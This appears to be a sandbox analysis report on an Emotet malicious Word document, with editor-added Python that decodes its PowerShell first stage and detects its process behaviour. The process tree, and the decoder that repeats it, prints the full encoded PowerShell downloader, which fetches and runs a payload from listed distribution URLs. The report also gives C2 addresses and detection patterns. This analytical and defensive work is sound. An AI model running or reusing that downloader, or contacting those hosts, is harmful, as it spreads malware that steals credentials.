Analysis Report SecuriteInfo.com.Exploit.Siggen2.12943.15385.16201

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen2.12943.15385.16201 (renamed file extension from 16201 to doc)
Analysis ID: 255710
MD5: 36fea8be4bf559852cc841616ff794d8
SHA1: 8aad9e4cb79ba290cae31a510e3b744367f5326d
SHA256: 43b649f8d39c8356d4c4920c61581ed58f90e56954ed5f90481f3b09cd059be0

Detection

Detected: Emotet, MailPassView
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Yara detected MailPassView
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Svchost Process
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Process Creation
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6260 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 4616 cmdline: powersheLL -e JABHAFMASgBLAE8AdABrAGoAPQAnAEgAUQBGAFEAVwB6AGUAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AGAAUgBgAEkAVAB5AFAAcgBgAG8AVABPAGMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAUwBYAEwAVQBQAGcAdwBpACAAPQAgACcANQA0ADUAJwA7ACQAVwBBAFEATABOAG8AdwBoAD0AJwBPAEgASQBFAFoAeQBoAHUAJwA7ACQAUQBMAFMASgBLAGkAcQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAFgATABVAFAAZwB3AGkAKwAnAC4AZQB4AGUAJwA7ACQARwBXAFoAWgBCAGoAagBqAD0AJwBDAEEATABRAEIAcwB1AG0AJwA7ACQAUgBOAFoATABNAHAAZQB6AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAEUAVAAuAFcARQBCAEMATABpAEUATgBUADsAJABGAEwAWQBDAE4AaQBwAGUAPQAnAGgAdAB0AHAAOgAvAC8AagBrAG4AYwByAGUAdwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAEsAaABTAE8AMQA2AFoAQQBBAGYALwAqAGgAdAB0AHAAOgAvAC8AagBtAGwAYQBuAGQAcwBjAGEAcABpAG4AZwBzAGUAcgB2AGkAYwBlAC4AYwBvAG0ALwBjAG8AbgB0AGUAbgB0AC8AZgBoAEcAQQBmAEsAcwAvACoAaAB0AHQAcAA6AC8ALwBqAGkAbQBsAG8AdwByAHkALgBjAG8AbQAvAGQAbABxAEMAVABjADAAMQBwAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbABlAHMAbABpAGUAbQBvAG4AdABlAG4AZQBnAHIAbwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ASQAxAGgASABxAEQARQA2AC8AKgBoAHQAdABwADoALwAvAGoAbwBoAG4AawBlAGEAbgBlAHMAdAB1AGQAaQBvAHMALgBjAG8AbQAvAHIAMAAwAHQALwB2AEEAVwBFAGwAUgBtAC8AJwAuACIAUwBQAEwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRAEcAVwBWAFMAbABkAHUAPQAnAFkATQBHAFIAUABmAGIAZwAnADsAZgBvAHIAZQBhAGMAaAAoACQASgBXAFAAQQBJAGoAbwBtACAAaQBuACAAJABGAEwAWQBDAE4AaQBwAGUAKQB7AHQAcgB5AHsAJABSAE4AWgBMAE0AcABlAHoALgAiAEQAbwBXAGAATgBMAG8AQQBgAEQARgBpAEwARQAiACgAJABKAFcAUABBAEkAagBvAG0ALAAgACQAUQBMAFMASgBLAGkAcQBhACkAOwAkAEMAWABaAEcAQwBkAGEAdAA9ACcAVgBYAEYAUQBKAG4AcABxACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQAUQBMAFMASgBLAGkAcQBhACkALgAiAGwAYABlAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAwADIAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAEEAdABlACIAKAAkAFEATABTAEoASwBpAHEAYQApADsAJABLAEUATgBXAEgAcwBsAHcAPQAnAEwATABGAE8AVQBiAHMAcAAnADsAYgByAGUAYQBrADsAJABLAEUAUwBWAFkAZQBoAHgAPQAnAEkARABUAEIAWQBzAHcAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAEIAUgBOAFIAZwBzAGgAPQAnAFAASQBMAE8AUgB4AGYAZwAnAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 545.exe (PID: 5980 cmdline: C:\Users\user\545.exe MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
    • KernelBase.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\olecli32\KernelBase.exe MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • svchost.exe (PID: 3624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • KernelBase.exe (PID: 4516 cmdline: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' 'C:\Users\user~1\AppData\Local\Temp\9FB0.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • KernelBase.exe (PID: 6752 cmdline: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A714.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • KernelBase.exe (PID: 3624 cmdline: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A909.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)
      • KernelBaseoe.exe (PID: 4324 cmdline: 'C:\Windows\SysWOW64\olecli32\KernelBaseoe.exe' 'C:\Users\user~1\AppData\Local\Temp\9FB0.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 5020 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5668 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3396 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3448 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 892 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6584 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4340 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6668 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
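The -e argument on the powershell.exe entry above is the entire first stage. The following Python is an added worked example by the editor, not code from the Joe Sandbox report or from the sample: it decodes that exact command line (PowerShell's -EncodedCommand is base64 over the UTF-16LE bytes of the script, which is why every other byte is NUL and the blob shows the "AxAyA" pattern), strips the backtick and string-concatenation obfuscation, and extracts the payload URL list, the drop path and the minimum-size check. The only input is the base64 string copied verbatim from the process tree; the field names in the returned dict are the editor's own.

```python
import base64
import re

# The -e argument of powershell.exe (PID 4616), copied verbatim from the process tree.
ENCODED_CMD = "JABHAFMASgBLAE8AdABrAGoAPQAnAEgAUQBGAFEAVwB6AGUAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AGAAUgBgAEkAVAB5AFAAcgBgAG8AVABPAGMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAUwBYAEwAVQBQAGcAdwBpACAAPQAgACcANQA0ADUAJwA7ACQAVwBBAFEATABOAG8AdwBoAD0AJwBPAEgASQBFAFoAeQBoAHUAJwA7ACQAUQBMAFMASgBLAGkAcQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAFgATABVAFAAZwB3AGkAKwAnAC4AZQB4AGUAJwA7ACQARwBXAFoAWgBCAGoAagBqAD0AJwBDAEEATABRAEIAcwB1AG0AJwA7ACQAUgBOAFoATABNAHAAZQB6AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAEUAVAAuAFcARQBCAEMATABpAEUATgBUADsAJABGAEwAWQBDAE4AaQBwAGUAPQAnAGgAdAB0AHAAOgAvAC8AagBrAG4AYwByAGUAdwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAEsAaABTAE8AMQA2AFoAQQBBAGYALwAqAGgAdAB0AHAAOgAvAC8AagBtAGwAYQBuAGQAcwBjAGEAcABpAG4AZwBzAGUAcgB2AGkAYwBlAC4AYwBvAG0ALwBjAG8AbgB0AGUAbgB0AC8AZgBoAEcAQQBmAEsAcwAvACoAaAB0AHQAcAA6AC8ALwBqAGkAbQBsAG8AdwByAHkALgBjAG8AbQAvAGQAbABxAEMAVABjADAAMQBwAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbABlAHMAbABpAGUAbQBvAG4AdABlAG4AZQBnAHIAbwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ASQAxAGgASABxAEQARQA2AC8AKgBoAHQAdABwADoALwAvAGoAbwBoAG4AawBlAGEAbgBlAHMAdAB1AGQAaQBvAHMALgBjAG8AbQAvAHIAMAAwAHQALwB2AEEAVwBFAGwAUgBtAC8AJwAuACIAUwBQAEwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRAEcAVwBWAFMAbABkAHUAPQAnAFkATQBHAFIAUABmAGIAZwAnADsAZgBvAHIAZQBhAGMAaAAoACQASgBXAFAAQQBJAGoAbwBtACAAaQBuACAAJABGAEwAWQBDAE4AaQBwAGUAKQB7AHQAcgB5AHsAJABSAE4AWgBMAE0AcABlAHoALgAiAEQAbwBXAGAATgBMAG8AQQBgAEQARgBpAEwARQAiACgAJABKAFcAUABBAEkAagBvAG0ALAAgACQAUQBMAFMASgBLAGkAcQBhACkAOwAkAEMAWABaAEcAQwBkAGEAdAA9ACcAVgBYAEYAUQBKAG4AcABxACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQAUQBMAFMASgBLAGkAcQBhACkALgAiAGwAYABlAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAwADIAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAEEAdABlACIAKAAkAFEATABTAEoASwBpAHEAYQApADsAJABLAEUATgBXAEgAcwBsAHcAPQAnAEwATABGAE8AVQBiAHMAcAAnADsAYgByAGUAYQBrADsAJABLAEUAUwBWAFkAZQBoAHgAPQAnAEkARABUAEIAWQBzAHcAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAEIAUgBOAFIAZwBzAGgAPQAnAFAASQBMAE8AUgB4AGYAZwAnAA=="


def decode_encoded_command(b64: str) -> str:
    """Reverse powershell -e / -EncodedCommand: base64 over the UTF-16LE script bytes."""
    raw = base64.b64decode("".join(b64.split()))
    return raw.decode("utf-16-le").lstrip("\ufeff")


def deobfuscate(script: str) -> str:
    """Undo the two cheap tricks this loader uses so the IOCs become greppable:
    backtick escapes inside quoted member names ("DoW`NLoA`DFiLE" -> DoWNLoADFiLE)
    and cmdlet names assembled from literals ('new-'+'ob'+'ject' -> 'new-object')."""
    s = re.sub(r'"([A-Za-z`]+)"', lambda m: m.group(1).replace("`", ""), script)
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while True:  # repeat until no adjacent literal pairs remain (3-part concatenations)
        s, n = concat.subn(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if n == 0:
            return s


def extract_iocs(script: str) -> dict:
    """Pull the downloader's IOCs from the decoded script (dict keys are the editor's)."""
    s = deobfuscate(script)
    # All payload URLs sit in one literal and are split at runtime on [char]42 ('*').
    m = re.search(r"'([^']*)'\.SPLIT\(\[char\](\d+)\)", s, re.IGNORECASE)
    urls = [u for u in m.group(1).split(chr(int(m.group(2)))) if u] if m else []
    # Drop path is built as $env:userprofile + '\' + <var> + '.exe'; <var> is set earlier.
    drop = None
    m = re.search(r"\$env:userprofile\+'\\'\+\$(\w+)\+'\.exe'", s, re.IGNORECASE)
    if m:
        v = re.search(r"\$" + re.escape(m.group(1)) + r"\s*=\s*'([^']*)'", s)
        if v:
            drop = "%USERPROFILE%\\" + v.group(1) + ".exe"
    # The download only runs if it is at least N bytes, which filters out the HTML
    # error pages a dead distribution site returns (compare the 403 Snort alert).
    m = re.search(r"-ge\s+(\d+)", s)
    min_size = int(m.group(1)) if m else None
    # Execution goes through WMI Win32_Process.Create rather than Start-Process,
    # which is why 545.exe is not a child of powershell.exe in the process tree.
    wmi = re.search(r"\[wmiclass\]'win32_process'\)\.create\(", s, re.IGNORECASE) is not None
    return {"urls": urls, "drop_path": drop, "min_size": min_size, "wmi_exec": wmi}


if __name__ == "__main__":
    script = decode_encoded_command(ENCODED_CMD)
    print(deobfuscate(script))
    for key, value in extract_iocs(script).items():
        print(f"{key}: {value}")
```

The five URLs that come out are the Emotet distribution sites the sandbox then tried (the first two appear in the HTTP GETs under Networking), the drop path resolves to C:\Users\user\545.exe, and the 30209-byte threshold explains why a 403 response is simply skipped and the next URL tried.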

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Dropped Files

Source | Rule | Description | Author
C:\Users\user\Documents\20200802\PowerShell_transcript.579569.3ZGnUeWK.20200802001556.txt | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x23:$s1: PowerShell
  • 0x105:$s1: powersheLL
  • 0xfd1:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xfd1:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xfd1:$sn3: PowerShell
  • 0x107:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.579569.3ZGnUeWK.20200802001556.txt | JoeSecurity_EmotetDownloader | Yara detected Emotet Downloader | Joe Security

Memory Dumps

Source | Rule | Description | Author
00000010.00000002.370334876.0000000000400000.00000040.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000007.00000002.516703537.00000000021E1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000007.00000003.364567875.0000000002954000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000010.00000001.366367529.0000000000400000.00000040.00020000.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000007.00000003.365514796.00000000036BC000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(the full report lists 22 entries; the first five are shown here)

Unpacked PEs

Source | Rule | Description | Author
7.2.KernelBase.exe.3300000.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
7.2.KernelBase.exe.3150000.2.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
17.1.KernelBase.exe.400000.0.raw.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
17.1.KernelBase.exe.400000.0.raw.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
7.3.KernelBase.exe.3470000.3.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
(the full report lists 19 entries; the first six are shown here)

Note on the BabyShark/KimJongRAT hit: the strings it fires on (logins.json, the moz_logins SELECT, mozsqlite3.dll, "SMTP Password") are generic browser and mail credential-recovery strings, and the same unpacked image is matched by JoeSecurity_MailPassView. This is string overlap with the NirSoft-derived password-recovery module Emotet injects, not evidence of a BabyShark component; the Emotet classification stands.

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth
  Command: C:\Windows\System32\svchost.exe -k netsvcs -p
  CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p
  CommandLine|base64offset|contains:
  Image: C:\Windows\System32\svchost.exe
  NewProcessName: C:\Windows\System32\svchost.exe
  OriginalFileName: C:\Windows\System32\svchost.exe
  ParentCommandLine: C:\Windows\SysWOW64\olecli32\KernelBase.exe
  ParentImage: C:\Windows\SysWOW64\olecli32\KernelBase.exe
  ParentProcessId: 6960
  ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p
  ProcessId: 3624

Sigma detected: Suspicious Process Creation
Source: Process started | Author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update)
  Command: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A714.tmp'
  CommandLine: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A714.tmp'
  CommandLine|base64offset|contains: (f
  Image: C:\Windows\SysWOW64\olecli32\KernelBase.exe
  NewProcessName: C:\Windows\SysWOW64\olecli32\KernelBase.exe
  OriginalFileName: C:\Windows\SysWOW64\olecli32\KernelBase.exe
  ParentCommandLine: C:\Windows\SysWOW64\olecli32\KernelBase.exe
  ParentImage: C:\Windows\SysWOW64\olecli32\KernelBase.exe
  ParentProcessId: 6960
  ProcessCommandLine: 'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A714.tmp'
  ProcessId: 6752
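Both Sigma hits above come from process-creation telemetry alone: an svchost.exe whose parent is not services.exe, and a NirSoft-style /scomma export switch on a binary living under SysWOW64\olecli32. As an added example by the editor (not Joe Security's code and not the published Sigma rules themselves), the Python below encodes that logic, plus the Office-to-PowerShell and encoded-command checks the process tree also supports, and runs it over events reconstructed from the report's Startup section. Assumptions: the parent of the ordinary svchost.exe instances is not shown in the report, so services.exe is filled in for the control event; the powershell.exe image path is the standard one; the svchost parent allow-list is the editor's reading of the public rule; the case-anomaly check is an approximation of the PowerShell_Case_Anomaly idea.

```python
import re

SERVICES = r"C:\Windows\System32\services.exe"                      # assumed parent (not in report)
KERNELBASE = r"C:\Windows\SysWOW64\olecli32\KernelBase.exe"         # Emotet's renamed copy
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  # assumed image path

# Process-start events reconstructed from the Startup tree (cmd for PID 4616 is shortened).
EVENTS = [
    {"pid": 4616, "image": POWERSHELL,
     "cmd": "powersheLL -e JABHAFMASgBLAE8AdABrAGoAPQAnAEgAUQBGAFEAVwB6AGUAbgAnADsAWwBOAGUAdAAuAFMA",
     "parent": r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE"},
    {"pid": 6940, "image": r"C:\Windows\System32\svchost.exe",
     "cmd": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS", "parent": SERVICES},
    {"pid": 3624, "image": r"C:\Windows\System32\svchost.exe",
     "cmd": r"C:\Windows\System32\svchost.exe -k netsvcs -p", "parent": KERNELBASE},
    {"pid": 6752, "image": KERNELBASE,
     "cmd": r"'C:\Windows\SysWOW64\olecli32\KernelBase.exe' /scomma 'C:\Users\user~1\AppData\Local\Temp\A714.tmp'",
     "parent": KERNELBASE},
]

# Legitimate svchost.exe parents (editor's reading of the public Sigma rule's filter).
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}
# NirSoft "save report" switches; /scomma writes the harvested credentials as CSV.
NIRSOFT_SWITCHES = ("/stext", "/scomma", "/stab", "/shtml", "/sverhtml", "/sxml")
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_svchost(ev: dict) -> bool:
    return _base(ev["image"]) == "svchost.exe" and _base(ev["parent"]) not in SVCHOST_PARENTS


def nirsoft_export(ev: dict) -> bool:
    low = ev["cmd"].lower()
    return any(f" {sw} " in low for sw in NIRSOFT_SWITCHES)


def office_spawned_powershell(ev: dict) -> bool:
    return _base(ev["parent"]) in OFFICE_APPS and _base(ev["image"]) == "powershell.exe"


def encoded_command(ev: dict) -> bool:
    # -e / -ec / -enc / -encodedcommand in any case, followed by a base64 run.
    return re.search(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", ev["cmd"]) is not None


def powershell_case_anomaly(ev: dict) -> bool:
    # The binary name as typed ("powersheLL") equals powershell case-insensitively but
    # is none of the spellings a human or a script normally produces.
    first = ev["cmd"].split(" ", 1)[0].strip("'\"").rsplit("\\", 1)[-1]
    stem = first[:-4] if first.lower().endswith(".exe") else first
    return stem.lower() == "powershell" and stem not in ("powershell", "PowerShell", "POWERSHELL", "Powershell")


RULES = {
    "suspicious_svchost": suspicious_svchost,
    "nirsoft_export": nirsoft_export,
    "office_spawned_powershell": office_spawned_powershell,
    "encoded_command": encoded_command,
    "powershell_case_anomaly": powershell_case_anomaly,
}


def run_rules(events: list) -> dict:
    """Map each PID to the names of the rules it triggers."""
    return {ev["pid"]: [name for name, fn in RULES.items() if fn(ev)] for ev in events}


if __name__ == "__main__":
    for pid, hits in run_rules(EVENTS).items():
        print(pid, hits or "-")
```

The svchost.exe under services.exe (PID 6940) stays clean, which is the point of the parent filter: the rule keys on lineage, not on the svchost command line, so the -k netsvcs -p arguments Emotet copies from real instances do not help it.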

Signature Overview

Source: C:\Users\user\545.exe | Code function: 6_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,6_2_00401078
Source: C:\Users\user\545.exe | Code function: 6_2_00444717 lstrlenA,FindFirstFileA,FindClose,6_2_00444717
Source: C:\Users\user\545.exe | Code function: 6_2_004047C0 FindFirstFileA,FindNextFileA,FindClose,6_2_004047C0
Source: C:\Users\user\545.exe | Code function: 6_2_004028E0 FindFirstFileA,FindClose,6_2_004028E0
Source: C:\Users\user\545.exe | Code function: 6_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,6_2_004390BA
Source: C:\Windows\SysWOW64\olecli32\KernelBase.exe | Code function: 16_2_0040A1A7 FindFirstFileW,FindNextFileW,16_2_0040A1A7
Source: C:\Windows\SysWOW64\olecli32\KernelBase.exe | Code function: 16_1_0040A1A7 FindFirstFileW,FindNextFileW,16_1_0040A1A7
Source: C:\Windows\SysWOW64\olecli32\KernelBase.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\SysWOW64\olecli32\KernelBase.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\SysWOW64\olecli32\KernelBase.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\
Source: C:\Windows\SysWOW64\olecli32\KernelBase.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\
Source: C:\Windows\SysWOW64\olecli32\KernelBase.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\olecli32\KernelBase.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
Source: winword.exe | Memory has grown: Private usage: 0MB later: 64MB
Source: global traffic | DNS query: name: jkncrew.com
Source: global traffic | TCP traffic: 192.168.2.7:49746 -> 185.94.252.13:443
Source: global traffic | TCP traffic: 192.168.2.7:49732 -> 50.31.160.189:80

                      Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 50.31.160.189:80 -> 192.168.2.7:49732
Source: Traffic | Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.7:49746 -> 185.94.252.13:443
Source: global traffic | HTTP traffic detected: GET /cgi-bin/KhSO16ZAAf/ HTTP/1.1 | Host: jkncrew.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /content/fhGAfKs/ HTTP/1.1 | Host: jmlandscapingservice.com | Connection: Keep-Alive
